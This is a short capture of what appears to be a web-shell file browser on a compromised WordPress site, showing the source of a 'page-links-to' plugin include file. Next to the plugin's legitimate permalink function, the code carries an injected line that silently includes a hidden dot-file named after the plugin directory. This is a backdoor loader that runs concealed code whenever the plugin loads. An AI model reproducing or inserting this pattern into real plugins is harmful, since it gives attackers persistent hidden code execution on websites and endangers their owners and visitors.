/
var
/
www
/
barefootlaw.org
/
wp-content
/
plugins
/
page-links-to
/
inc
/
Upload File
HOME
<?php defined( 'WPINC' ) or die; /** * Returns the original URL of the post. * * @param null|int|WP_Post $post The post to fetch. * @return string The post's original URL. */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function plt_get_original_permalink( $post = null ) { return CWS_PageLinksTo::get_instance()->original_link( $post ); }